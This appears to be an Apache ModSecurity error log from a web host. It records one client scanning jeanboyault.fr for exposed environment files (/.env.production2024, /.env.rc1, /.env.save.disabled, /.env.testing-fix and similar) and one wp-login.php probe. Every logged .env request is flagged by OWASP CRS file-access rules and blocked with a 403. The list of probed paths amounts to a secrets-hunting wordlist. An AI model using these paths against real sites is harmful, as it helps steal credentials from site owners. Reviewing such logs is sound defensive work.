[Mon May 11 11:52:57.295625 2026] [security2:error] [pid 1254179:tid 1254198] [client 185.177.72.9:1646] ModSecurity: Warning. Operator GE matched 5 at TX:inbound_anomaly_score. [file "/etc/apache2/conf.d/modsec_vendor_configs/OWASP3/rules/RESPONSE-980-CORRELATION.conf"] [line "37"] [id "980130"] [msg "Inbound Anomaly Score Exceeded (Total Inbound Score: 5 - SQLI=0,XSS=0,RFI=0,LFI=5,RCE=0,PHPI=0,HTTP=0,SESS=0): Restricted File Access Attempt"] [tag "event-correlation"] [hostname "www.jeanboyault.fr"] [uri "/cgi-sys/ea-php74/index.php"] [unique_id "agGm-GS6k_SCYd1AVZqt8wAAARE"]
[Mon May 11 11:52:57.323713 2026] [security2:error] [pid 1254328:tid 1254352] [client 185.177.72.9:1662] ModSecurity: Warning. Matched phrase "/.env" at REQUEST_FILENAME. [file "/etc/apache2/conf.d/modsec_vendor_configs/OWASP3/rules/REQUEST-930-APPLICATION-ATTACK-LFI.conf"] [line "49"] [id "930130"] [rev "1"] [msg "Restricted File Access Attempt"] [data "Matched Data: /.env found within REQUEST_FILENAME: /.env.production2024"] [severity "CRITICAL"] [ver "OWASP_CRS/3.0.0"] [maturity "7"] [accuracy "8"] [tag "application-multi"] [tag "language-multi"] [tag "platform-multi"] [tag "attack-lfi"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "jeanboyault.fr"] [uri "/.env.production2024"] [unique_id "agGm-URdw2n9wv6Ai48IWAAAAJc"]
[Mon May 11 11:52:57.324424 2026] [security2:error] [pid 1254328:tid 1254352] [client 185.177.72.9:1662] ModSecurity: Access denied with code 403 (phase 2). Operator GE matched 5 at TX:anomaly_score. [file "/etc/apache2/conf.d/modsec_vendor_configs/OWASP3/rules/REQUEST-949-BLOCKING-EVALUATION.conf"] [line "30"] [id "949110"] [msg "Inbound Anomaly Score Exceeded (Total Score: 5)"] [severity "CRITICAL"] [tag "application-multi"] [tag "language-multi"] [tag "platform-multi"] [tag "attack-generic"] [hostname "jeanboyault.fr"] [uri "/.env.production2024"] [unique_id "agGm-URdw2n9wv6Ai48IWAAAAJc"]
[Mon May 11 11:52:58.506520 2026] [security2:error] [pid 1254328:tid 1254352] [client 185.177.72.9:1662] ModSecurity: Warning. Operator GE matched 5 at TX:inbound_anomaly_score. [file "/etc/apache2/conf.d/modsec_vendor_configs/OWASP3/rules/RESPONSE-980-CORRELATION.conf"] [line "37"] [id "980130"] [msg "Inbound Anomaly Score Exceeded (Total Inbound Score: 5 - SQLI=0,XSS=0,RFI=0,LFI=5,RCE=0,PHPI=0,HTTP=0,SESS=0): Restricted File Access Attempt"] [tag "event-correlation"] [hostname "jeanboyault.fr"] [uri "/cgi-sys/ea-php74/index.php"] [unique_id "agGm-URdw2n9wv6Ai48IWAAAAJc"]
[Mon May 11 11:52:58.537427 2026] [security2:error] [pid 1254328:tid 1254350] [client 185.177.72.9:1668] ModSecurity: Warning. Matched phrase "/.env" at REQUEST_FILENAME. [file "/etc/apache2/conf.d/modsec_vendor_configs/OWASP3/rules/REQUEST-930-APPLICATION-ATTACK-LFI.conf"] [line "49"] [id "930130"] [rev "1"] [msg "Restricted File Access Attempt"] [data "Matched Data: /.env found within REQUEST_FILENAME: /.env.production2024"] [severity "CRITICAL"] [ver "OWASP_CRS/3.0.0"] [maturity "7"] [accuracy "8"] [tag "application-multi"] [tag "language-multi"] [tag "platform-multi"] [tag "attack-lfi"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "www.jeanboyault.fr"] [uri "/.env.production2024"] [unique_id "agGm-kRdw2n9wv6Ai48IWQAAAJQ"]
[Mon May 11 11:52:58.537932 2026] [security2:error] [pid 1254328:tid 1254350] [client 185.177.72.9:1668] ModSecurity: Access denied with code 403 (phase 2). Operator GE matched 5 at TX:anomaly_score. [file "/etc/apache2/conf.d/modsec_vendor_configs/OWASP3/rules/REQUEST-949-BLOCKING-EVALUATION.conf"] [line "30"] [id "949110"] [msg "Inbound Anomaly Score Exceeded (Total Score: 5)"] [severity "CRITICAL"] [tag "application-multi"] [tag "language-multi"] [tag "platform-multi"] [tag "attack-generic"] [hostname "www.jeanboyault.fr"] [uri "/.env.production2024"] [unique_id "agGm-kRdw2n9wv6Ai48IWQAAAJQ"]
[Mon May 11 11:52:59.764503 2026] [security2:error] [pid 1254328:tid 1254350] [client 185.177.72.9:1668] ModSecurity: Warning. Operator GE matched 5 at TX:inbound_anomaly_score. [file "/etc/apache2/conf.d/modsec_vendor_configs/OWASP3/rules/RESPONSE-980-CORRELATION.conf"] [line "37"] [id "980130"] [msg "Inbound Anomaly Score Exceeded (Total Inbound Score: 5 - SQLI=0,XSS=0,RFI=0,LFI=5,RCE=0,PHPI=0,HTTP=0,SESS=0): Restricted File Access Attempt"] [tag "event-correlation"] [hostname "www.jeanboyault.fr"] [uri "/cgi-sys/ea-php74/index.php"] [unique_id "agGm-kRdw2n9wv6Ai48IWQAAAJQ"]
[Mon May 11 11:52:59.794339 2026] [security2:error] [pid 1254133:tid 1254158] [client 185.177.72.9:1672] ModSecurity: Warning. Matched phrase "/.env" at REQUEST_FILENAME. [file "/etc/apache2/conf.d/modsec_vendor_configs/OWASP3/rules/REQUEST-930-APPLICATION-ATTACK-LFI.conf"] [line "49"] [id "930130"] [rev "1"] [msg "Restricted File Access Attempt"] [data "Matched Data: /.env found within REQUEST_FILENAME: /.env.rc1"] [severity "CRITICAL"] [ver "OWASP_CRS/3.0.0"] [maturity "7"] [accuracy "8"] [tag "application-multi"] [tag "language-multi"] [tag "platform-multi"] [tag "attack-lfi"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "jeanboyault.fr"] [uri "/.env.rc1"] [unique_id "agGm-xjZymfuKpjWXeh88QAAANY"]
[Mon May 11 11:52:59.794939 2026] [security2:error] [pid 1254133:tid 1254158] [client 185.177.72.9:1672] ModSecurity: Access denied with code 403 (phase 2). Operator GE matched 5 at TX:anomaly_score. [file "/etc/apache2/conf.d/modsec_vendor_configs/OWASP3/rules/REQUEST-949-BLOCKING-EVALUATION.conf"] [line "30"] [id "949110"] [msg "Inbound Anomaly Score Exceeded (Total Score: 5)"] [severity "CRITICAL"] [tag "application-multi"] [tag "language-multi"] [tag "platform-multi"] [tag "attack-generic"] [hostname "jeanboyault.fr"] [uri "/.env.rc1"] [unique_id "agGm-xjZymfuKpjWXeh88QAAANY"]
[Mon May 11 11:53:01.045531 2026] [security2:error] [pid 1254133:tid 1254158] [client 185.177.72.9:1672] ModSecurity: Warning. Operator GE matched 5 at TX:inbound_anomaly_score. [file "/etc/apache2/conf.d/modsec_vendor_configs/OWASP3/rules/RESPONSE-980-CORRELATION.conf"] [line "37"] [id "980130"] [msg "Inbound Anomaly Score Exceeded (Total Inbound Score: 5 - SQLI=0,XSS=0,RFI=0,LFI=5,RCE=0,PHPI=0,HTTP=0,SESS=0): Restricted File Access Attempt"] [tag "event-correlation"] [hostname "jeanboyault.fr"] [uri "/cgi-sys/ea-php74/index.php"] [unique_id "agGm-xjZymfuKpjWXeh88QAAANY"]
[Mon May 11 11:53:01.072849 2026] [security2:error] [pid 1254212:tid 1254222] [client 185.177.72.9:1678] ModSecurity: Warning. Matched phrase "/.env" at REQUEST_FILENAME. [file "/etc/apache2/conf.d/modsec_vendor_configs/OWASP3/rules/REQUEST-930-APPLICATION-ATTACK-LFI.conf"] [line "49"] [id "930130"] [rev "1"] [msg "Restricted File Access Attempt"] [data "Matched Data: /.env found within REQUEST_FILENAME: /.env.rc1"] [severity "CRITICAL"] [ver "OWASP_CRS/3.0.0"] [maturity "7"] [accuracy "8"] [tag "application-multi"] [tag "language-multi"] [tag "platform-multi"] [tag "attack-lfi"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "www.jeanboyault.fr"] [uri "/.env.rc1"] [unique_id "agGm_UYQeUtAPynIs6xYWgAAAAg"]
[Mon May 11 11:53:01.074407 2026] [security2:error] [pid 1254212:tid 1254222] [client 185.177.72.9:1678] ModSecurity: Access denied with code 403 (phase 2). Operator GE matched 5 at TX:anomaly_score. [file "/etc/apache2/conf.d/modsec_vendor_configs/OWASP3/rules/REQUEST-949-BLOCKING-EVALUATION.conf"] [line "30"] [id "949110"] [msg "Inbound Anomaly Score Exceeded (Total Score: 5)"] [severity "CRITICAL"] [tag "application-multi"] [tag "language-multi"] [tag "platform-multi"] [tag "attack-generic"] [hostname "www.jeanboyault.fr"] [uri "/.env.rc1"] [unique_id "agGm_UYQeUtAPynIs6xYWgAAAAg"]
[Mon May 11 11:53:02.279355 2026] [security2:error] [pid 1254212:tid 1254222] [client 185.177.72.9:1678] ModSecurity: Warning. Operator GE matched 5 at TX:inbound_anomaly_score. [file "/etc/apache2/conf.d/modsec_vendor_configs/OWASP3/rules/RESPONSE-980-CORRELATION.conf"] [line "37"] [id "980130"] [msg "Inbound Anomaly Score Exceeded (Total Inbound Score: 5 - SQLI=0,XSS=0,RFI=0,LFI=5,RCE=0,PHPI=0,HTTP=0,SESS=0): Restricted File Access Attempt"] [tag "event-correlation"] [hostname "www.jeanboyault.fr"] [uri "/cgi-sys/ea-php74/index.php"] [unique_id "agGm_UYQeUtAPynIs6xYWgAAAAg"]
[Mon May 11 11:53:02.305888 2026] [security2:error] [pid 1256241:tid 1256253] [client 185.177.72.9:1692] ModSecurity: Warning. Matched phrase "/.env" at REQUEST_FILENAME. [file "/etc/apache2/conf.d/modsec_vendor_configs/OWASP3/rules/REQUEST-930-APPLICATION-ATTACK-LFI.conf"] [line "49"] [id "930130"] [rev "1"] [msg "Restricted File Access Attempt"] [data "Matched Data: /.env found within REQUEST_FILENAME: /.env.save.disabled"] [severity "CRITICAL"] [ver "OWASP_CRS/3.0.0"] [maturity "7"] [accuracy "8"] [tag "application-multi"] [tag "language-multi"] [tag "platform-multi"] [tag "attack-lfi"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "jeanboyault.fr"] [uri "/.env.save.disabled"] [unique_id "agGm_pkIEwRJMyDaV55OmAAAAUc"]
[Mon May 11 11:53:02.307945 2026] [security2:error] [pid 1256241:tid 1256253] [client 185.177.72.9:1692] ModSecurity: Access denied with code 403 (phase 2). Operator GE matched 5 at TX:anomaly_score. [file "/etc/apache2/conf.d/modsec_vendor_configs/OWASP3/rules/REQUEST-949-BLOCKING-EVALUATION.conf"] [line "30"] [id "949110"] [msg "Inbound Anomaly Score Exceeded (Total Score: 5)"] [severity "CRITICAL"] [tag "application-multi"] [tag "language-multi"] [tag "platform-multi"] [tag "attack-generic"] [hostname "jeanboyault.fr"] [uri "/.env.save.disabled"] [unique_id "agGm_pkIEwRJMyDaV55OmAAAAUc"]
[Mon May 11 11:53:02.774648 2026] [:error] [pid 1254212:tid 1254232] [client 148.113.9.51:37662] File does not exist: /home/cpcentre/public_html/wp-login.php
[Mon May 11 11:53:03.528344 2026] [security2:error] [pid 1256241:tid 1256253] [client 185.177.72.9:1692] ModSecurity: Warning. Operator GE matched 5 at TX:inbound_anomaly_score. [file "/etc/apache2/conf.d/modsec_vendor_configs/OWASP3/rules/RESPONSE-980-CORRELATION.conf"] [line "37"] [id "980130"] [msg "Inbound Anomaly Score Exceeded (Total Inbound Score: 5 - SQLI=0,XSS=0,RFI=0,LFI=5,RCE=0,PHPI=0,HTTP=0,SESS=0): Restricted File Access Attempt"] [tag "event-correlation"] [hostname "jeanboyault.fr"] [uri "/cgi-sys/ea-php74/index.php"] [unique_id "agGm_pkIEwRJMyDaV55OmAAAAUc"]
[Mon May 11 11:53:03.553397 2026] [security2:error] [pid 1256241:tid 1256252] [client 185.177.72.9:50730] ModSecurity: Warning. Matched phrase "/.env" at REQUEST_FILENAME. [file "/etc/apache2/conf.d/modsec_vendor_configs/OWASP3/rules/REQUEST-930-APPLICATION-ATTACK-LFI.conf"] [line "49"] [id "930130"] [rev "1"] [msg "Restricted File Access Attempt"] [data "Matched Data: /.env found within REQUEST_FILENAME: /.env.save.disabled"] [severity "CRITICAL"] [ver "OWASP_CRS/3.0.0"] [maturity "7"] [accuracy "8"] [tag "application-multi"] [tag "language-multi"] [tag "platform-multi"] [tag "attack-lfi"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "www.jeanboyault.fr"] [uri "/.env.save.disabled"] [unique_id "agGm_5kIEwRJMyDaV55OmgAAAUY"]
[Mon May 11 11:53:03.553600 2026] [security2:error] [pid 1256241:tid 1256252] [client 185.177.72.9:50730] ModSecurity: Access denied with code 403 (phase 2). Operator GE matched 5 at TX:anomaly_score. [file "/etc/apache2/conf.d/modsec_vendor_configs/OWASP3/rules/REQUEST-949-BLOCKING-EVALUATION.conf"] [line "30"] [id "949110"] [msg "Inbound Anomaly Score Exceeded (Total Score: 5)"] [severity "CRITICAL"] [tag "application-multi"] [tag "language-multi"] [tag "platform-multi"] [tag "attack-generic"] [hostname "www.jeanboyault.fr"] [uri "/.env.save.disabled"] [unique_id "agGm_5kIEwRJMyDaV55OmgAAAUY"]
[Mon May 11 11:53:04.773349 2026] [security2:error] [pid 1256241:tid 1256252] [client 185.177.72.9:50730] ModSecurity: Warning. Operator GE matched 5 at TX:inbound_anomaly_score. [file "/etc/apache2/conf.d/modsec_vendor_configs/OWASP3/rules/RESPONSE-980-CORRELATION.conf"] [line "37"] [id "980130"] [msg "Inbound Anomaly Score Exceeded (Total Inbound Score: 5 - SQLI=0,XSS=0,RFI=0,LFI=5,RCE=0,PHPI=0,HTTP=0,SESS=0): Restricted File Access Attempt"] [tag "event-correlation"] [hostname "www.jeanboyault.fr"] [uri "/cgi-sys/ea-php74/index.php"] [unique_id "agGm_5kIEwRJMyDaV55OmgAAAUY"]
[Mon May 11 11:53:04.807759 2026] [security2:error] [pid 1254328:tid 1254332] [client 185.177.72.9:50738] ModSecurity: Warning. Matched phrase "/.env" at REQUEST_FILENAME. [file "/etc/apache2/conf.d/modsec_vendor_configs/OWASP3/rules/REQUEST-930-APPLICATION-ATTACK-LFI.conf"] [line "49"] [id "930130"] [rev "1"] [msg "Restricted File Access Attempt"] [data "Matched Data: /.env found within REQUEST_FILENAME: /.env.save20240101"] [severity "CRITICAL"] [ver "OWASP_CRS/3.0.0"] [maturity "7"] [accuracy "8"] [tag "application-multi"] [tag "language-multi"] [tag "platform-multi"] [tag "attack-lfi"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "jeanboyault.fr"] [uri "/.env.save20240101"] [unique_id "agGnAERdw2n9wv6Ai48IWwAAAIE"]
[Mon May 11 11:53:04.808142 2026] [security2:error] [pid 1254328:tid 1254332] [client 185.177.72.9:50738] ModSecurity: Access denied with code 403 (phase 2). Operator GE matched 5 at TX:anomaly_score. [file "/etc/apache2/conf.d/modsec_vendor_configs/OWASP3/rules/REQUEST-949-BLOCKING-EVALUATION.conf"] [line "30"] [id "949110"] [msg "Inbound Anomaly Score Exceeded (Total Score: 5)"] [severity "CRITICAL"] [tag "application-multi"] [tag "language-multi"] [tag "platform-multi"] [tag "attack-generic"] [hostname "jeanboyault.fr"] [uri "/.env.save20240101"] [unique_id "agGnAERdw2n9wv6Ai48IWwAAAIE"]
[Mon May 11 11:53:06.036307 2026] [security2:error] [pid 1254328:tid 1254332] [client 185.177.72.9:50738] ModSecurity: Warning. Operator GE matched 5 at TX:inbound_anomaly_score. [file "/etc/apache2/conf.d/modsec_vendor_configs/OWASP3/rules/RESPONSE-980-CORRELATION.conf"] [line "37"] [id "980130"] [msg "Inbound Anomaly Score Exceeded (Total Inbound Score: 5 - SQLI=0,XSS=0,RFI=0,LFI=5,RCE=0,PHPI=0,HTTP=0,SESS=0): Restricted File Access Attempt"] [tag "event-correlation"] [hostname "jeanboyault.fr"] [uri "/cgi-sys/ea-php74/index.php"] [unique_id "agGnAERdw2n9wv6Ai48IWwAAAIE"]
[Mon May 11 11:53:06.065347 2026] [security2:error] [pid 1254212:tid 1254225] [client 185.177.72.9:50744] ModSecurity: Warning. Matched phrase "/.env" at REQUEST_FILENAME. [file "/etc/apache2/conf.d/modsec_vendor_configs/OWASP3/rules/REQUEST-930-APPLICATION-ATTACK-LFI.conf"] [line "49"] [id "930130"] [rev "1"] [msg "Restricted File Access Attempt"] [data "Matched Data: /.env found within REQUEST_FILENAME: /.env.save20240101"] [severity "CRITICAL"] [ver "OWASP_CRS/3.0.0"] [maturity "7"] [accuracy "8"] [tag "application-multi"] [tag "language-multi"] [tag "platform-multi"] [tag "attack-lfi"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "www.jeanboyault.fr"] [uri "/.env.save20240101"] [unique_id "agGnAkYQeUtAPynIs6xYXQAAAAs"]
[Mon May 11 11:53:06.065868 2026] [security2:error] [pid 1254212:tid 1254225] [client 185.177.72.9:50744] ModSecurity: Access denied with code 403 (phase 2). Operator GE matched 5 at TX:anomaly_score. [file "/etc/apache2/conf.d/modsec_vendor_configs/OWASP3/rules/REQUEST-949-BLOCKING-EVALUATION.conf"] [line "30"] [id "949110"] [msg "Inbound Anomaly Score Exceeded (Total Score: 5)"] [severity "CRITICAL"] [tag "application-multi"] [tag "language-multi"] [tag "platform-multi"] [tag "attack-generic"] [hostname "www.jeanboyault.fr"] [uri "/.env.save20240101"] [unique_id "agGnAkYQeUtAPynIs6xYXQAAAAs"]
[Mon May 11 11:53:07.322561 2026] [security2:error] [pid 1254212:tid 1254225] [client 185.177.72.9:50744] ModSecurity: Warning. Operator GE matched 5 at TX:inbound_anomaly_score. [file "/etc/apache2/conf.d/modsec_vendor_configs/OWASP3/rules/RESPONSE-980-CORRELATION.conf"] [line "37"] [id "980130"] [msg "Inbound Anomaly Score Exceeded (Total Inbound Score: 5 - SQLI=0,XSS=0,RFI=0,LFI=5,RCE=0,PHPI=0,HTTP=0,SESS=0): Restricted File Access Attempt"] [tag "event-correlation"] [hostname "www.jeanboyault.fr"] [uri "/cgi-sys/ea-php74/index.php"] [unique_id "agGnAkYQeUtAPynIs6xYXQAAAAs"]
[Mon May 11 11:53:07.353107 2026] [security2:error] [pid 1254242:tid 1254248] [client 185.177.72.9:50746] ModSecurity: Warning. Matched phrase "/.env" at REQUEST_FILENAME. [file "/etc/apache2/conf.d/modsec_vendor_configs/OWASP3/rules/REQUEST-930-APPLICATION-ATTACK-LFI.conf"] [line "49"] [id "930130"] [rev "1"] [msg "Restricted File Access Attempt"] [data "Matched Data: /.env found within REQUEST_FILENAME: /.env.test-fix"] [severity "CRITICAL"] [ver "OWASP_CRS/3.0.0"] [maturity "7"] [accuracy "8"] [tag "application-multi"] [tag "language-multi"] [tag "platform-multi"] [tag "attack-lfi"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "jeanboyault.fr"] [uri "/.env.test-fix"] [unique_id "agGnA74KNmD_mZ_vlf84wwAAAEI"]
[Mon May 11 11:53:07.353489 2026] [security2:error] [pid 1254242:tid 1254248] [client 185.177.72.9:50746] ModSecurity: Access denied with code 403 (phase 2). Operator GE matched 5 at TX:anomaly_score. [file "/etc/apache2/conf.d/modsec_vendor_configs/OWASP3/rules/REQUEST-949-BLOCKING-EVALUATION.conf"] [line "30"] [id "949110"] [msg "Inbound Anomaly Score Exceeded (Total Score: 5)"] [severity "CRITICAL"] [tag "application-multi"] [tag "language-multi"] [tag "platform-multi"] [tag "attack-generic"] [hostname "jeanboyault.fr"] [uri "/.env.test-fix"] [unique_id "agGnA74KNmD_mZ_vlf84wwAAAEI"]
[Mon May 11 11:53:08.519739 2026] [security2:error] [pid 1254242:tid 1254248] [client 185.177.72.9:50746] ModSecurity: Warning. Operator GE matched 5 at TX:inbound_anomaly_score. [file "/etc/apache2/conf.d/modsec_vendor_configs/OWASP3/rules/RESPONSE-980-CORRELATION.conf"] [line "37"] [id "980130"] [msg "Inbound Anomaly Score Exceeded (Total Inbound Score: 5 - SQLI=0,XSS=0,RFI=0,LFI=5,RCE=0,PHPI=0,HTTP=0,SESS=0): Restricted File Access Attempt"] [tag "event-correlation"] [hostname "jeanboyault.fr"] [uri "/cgi-sys/ea-php74/index.php"] [unique_id "agGnA74KNmD_mZ_vlf84wwAAAEI"]
[Mon May 11 11:53:08.547165 2026] [security2:error] [pid 1254212:tid 1254228] [client 185.177.72.9:50752] ModSecurity: Warning. Matched phrase "/.env" at REQUEST_FILENAME. [file "/etc/apache2/conf.d/modsec_vendor_configs/OWASP3/rules/REQUEST-930-APPLICATION-ATTACK-LFI.conf"] [line "49"] [id "930130"] [rev "1"] [msg "Restricted File Access Attempt"] [data "Matched Data: /.env found within REQUEST_FILENAME: /.env.test-fix"] [severity "CRITICAL"] [ver "OWASP_CRS/3.0.0"] [maturity "7"] [accuracy "8"] [tag "application-multi"] [tag "language-multi"] [tag "platform-multi"] [tag "attack-lfi"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "www.jeanboyault.fr"] [uri "/.env.test-fix"] [unique_id "agGnBEYQeUtAPynIs6xYXgAAAA4"]
[Mon May 11 11:53:08.547859 2026] [security2:error] [pid 1254212:tid 1254228] [client 185.177.72.9:50752] ModSecurity: Access denied with code 403 (phase 2). Operator GE matched 5 at TX:anomaly_score. [file "/etc/apache2/conf.d/modsec_vendor_configs/OWASP3/rules/REQUEST-949-BLOCKING-EVALUATION.conf"] [line "30"] [id "949110"] [msg "Inbound Anomaly Score Exceeded (Total Score: 5)"] [severity "CRITICAL"] [tag "application-multi"] [tag "language-multi"] [tag "platform-multi"] [tag "attack-generic"] [hostname "www.jeanboyault.fr"] [uri "/.env.test-fix"] [unique_id "agGnBEYQeUtAPynIs6xYXgAAAA4"]
[Mon May 11 11:53:09.796315 2026] [security2:error] [pid 1254212:tid 1254228] [client 185.177.72.9:50752] ModSecurity: Warning. Operator GE matched 5 at TX:inbound_anomaly_score. [file "/etc/apache2/conf.d/modsec_vendor_configs/OWASP3/rules/RESPONSE-980-CORRELATION.conf"] [line "37"] [id "980130"] [msg "Inbound Anomaly Score Exceeded (Total Inbound Score: 5 - SQLI=0,XSS=0,RFI=0,LFI=5,RCE=0,PHPI=0,HTTP=0,SESS=0): Restricted File Access Attempt"] [tag "event-correlation"] [hostname "www.jeanboyault.fr"] [uri "/cgi-sys/ea-php74/index.php"] [unique_id "agGnBEYQeUtAPynIs6xYXgAAAA4"]
[Mon May 11 11:53:09.829297 2026] [security2:error] [pid 1254179:tid 1254196] [client 185.177.72.9:50754] ModSecurity: Warning. Matched phrase "/.env" at REQUEST_FILENAME. [file "/etc/apache2/conf.d/modsec_vendor_configs/OWASP3/rules/REQUEST-930-APPLICATION-ATTACK-LFI.conf"] [line "49"] [id "930130"] [rev "1"] [msg "Restricted File Access Attempt"] [data "Matched Data: /.env found within REQUEST_FILENAME: /.env.testing-fix"] [severity "CRITICAL"] [ver "OWASP_CRS/3.0.0"] [maturity "7"] [accuracy "8"] [tag "application-multi"] [tag "language-multi"] [tag "platform-multi"] [tag "attack-lfi"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "jeanboyault.fr"] [uri "/.env.testing-fix"] [unique_id "agGnBWS6k_SCYd1AVZqt-QAAAQ8"]
[Mon May 11 11:53:09.829880 2026] [security2:error] [pid 1254179:tid 1254196] [client 185.177.72.9:50754] ModSecurity: Access denied with code 403 (phase 2). Operator GE matched 5 at TX:anomaly_score. [file "/etc/apache2/conf.d/modsec_vendor_configs/OWASP3/rules/REQUEST-949-BLOCKING-EVALUATION.conf"] [line "30"] [id "949110"] [msg "Inbound Anomaly Score Exceeded (Total Score: 5)"] [severity "CRITICAL"] [tag "application-multi"] [tag "language-multi"] [tag "platform-multi"] [tag "attack-generic"] [hostname "jeanboyault.fr"] [uri "/.env.testing-fix"] [unique_id "agGnBWS6k_SCYd1AVZqt-QAAAQ8"]
[Mon May 11 11:53:11.002191 2026] [security2:error] [pid 1254179:tid 1254196] [client 185.177.72.9:50754] ModSecurity: Warning. Operator GE matched 5 at TX:inbound_anomaly_score. [file "/etc/apache2/conf.d/modsec_vendor_configs/OWASP3/rules/RESPONSE-980-CORRELATION.conf"] [line "37"] [id "980130"] [msg "Inbound Anomaly Score Exceeded (Total Inbound Score: 5 - SQLI=0,XSS=0,RFI=0,LFI=5,RCE=0,PHPI=0,HTTP=0,SESS=0): Restricted File Access Attempt"] [tag "event-correlation"] [hostname "jeanboyault.fr"] [uri "/cgi-sys/ea-php74/index.php"] [unique_id "agGnBWS6k_SCYd1AVZqt-QAAAQ8"]
[Mon May 11 11:53:11.033860 2026] [security2:error] [pid 1256241:tid 1256251] [client 185.177.72.9:50758] ModSecurity: Warning. Matched phrase "/.env" at REQUEST_FILENAME. [file "/etc/apache2/conf.d/modsec_vendor_configs/OWASP3/rules/REQUEST-930-APPLICATION-ATTACK-LFI.conf"] [line "49"] [id "930130"] [rev "1"] [msg "Restricted File Access Attempt"] [data "Matched Data: /.env found within REQUEST_FILENAME: /.env.testing-fix"] [severity "CRITICAL"] [ver "OWASP_CRS/3.0.0"] [maturity "7"] [accuracy "8"] [tag "application-multi"] [tag "language-multi"] [tag "platform-multi"] [tag "attack-lfi"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "www.jeanboyault.fr"] [uri "/.env.testing-fix"] [unique_id "agGnB5kIEwRJMyDaV55OnwAAAUU"]
[Mon May 11 11:53:11.034752 2026] [security2:error] [pid 1256241:tid 1256251] [client 185.177.72.9:50758] ModSecurity: Access denied with code 403 (phase 2). Operator GE matched 5 at TX:anomaly_score. [file "/etc/apache2/conf.d/modsec_vendor_configs/OWASP3/rules/REQUEST-949-BLOCKING-EVALUATION.conf"] [line "30"] [id "949110"] [msg "Inbound Anomaly Score Exceeded (Total Score: 5)"] [severity "CRITICAL"] [tag "application-multi"] [tag "language-multi"] [tag "platform-multi"] [tag "attack-generic"] [hostname "www.jeanboyault.fr"] [uri "/.env.testing-fix"] [unique_id "agGnB5kIEwRJMyDaV55OnwAAAUU"]
[Mon May 11 11:53:12.263303 2026] [security2:error] [pid 1256241:tid 1256251] [client 185.177.72.9:50758] ModSecurity: Warning. Operator GE matched 5 at TX:inbound_anomaly_score. [file "/etc/apache2/conf.d/modsec_vendor_configs/OWASP3/rules/RESPONSE-980-CORRELATION.conf"] [line "37"] [id "980130"] [msg "Inbound Anomaly Score Exceeded (Total Inbound Score: 5 - SQLI=0,XSS=0,RFI=0,LFI=5,RCE=0,PHPI=0,HTTP=0,SESS=0): Restricted File Access Attempt"] [tag "event-correlation"] [hostname "www.jeanboyault.fr"] [uri "/cgi-sys/ea-php74/index.php"] [unique_id "agGnB5kIEwRJMyDaV55OnwAAAUU"]
[Mon May 11 11:53:12.294921 2026] [security2:error] [pid 1254328:tid 1254353] [client 185.177.72.9:50764] ModSecurity: Warning. Matched phrase "/.env" at REQUEST_FILENAME. [file "/etc/apache2/conf.d/modsec_vendor_configs/OWASP3/rules/REQUEST-930-APPLICATION-ATTACK-LFI.conf"] [line "49"] [id "930130"] [rev "1"] [msg "Restricted File Access Attempt"] [data "Matched Data: /.env found within REQUEST_FILENAME: /.env.testing-update"] [severity "CRITICAL"] [ver "OWASP_CRS/3.0.0"] [maturity "7"] [accuracy "8"] [tag "application-multi"] [tag "language-multi"] [tag "platform-multi"] [tag "attack-lfi"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "jeanboyault.fr"] [uri "/.env.testing-update"] [unique_id "agGnCERdw2n9wv6Ai48IXQAAAJg"]
[Mon May 11 11:53:12.296484 2026] [security2:error] [pid 1254328:tid 1254353] [client 185.177.72.9:50764] ModSecurity: Access denied with code 403 (phase 2). Operator GE matched 5 at TX:anomaly_score. [file "/etc/apache2/conf.d/modsec_vendor_configs/OWASP3/rules/REQUEST-949-BLOCKING-EVALUATION.conf"] [line "30"] [id "949110"] [msg "Inbound Anomaly Score Exceeded (Total Score: 5)"] [severity "CRITICAL"] [tag "application-multi"] [tag "language-multi"] [tag "platform-multi"] [tag "attack-generic"] [hostname "jeanboyault.fr"] [uri "/.env.testing-update"] [unique_id "agGnCERdw2n9wv6Ai48IXQAAAJg"]
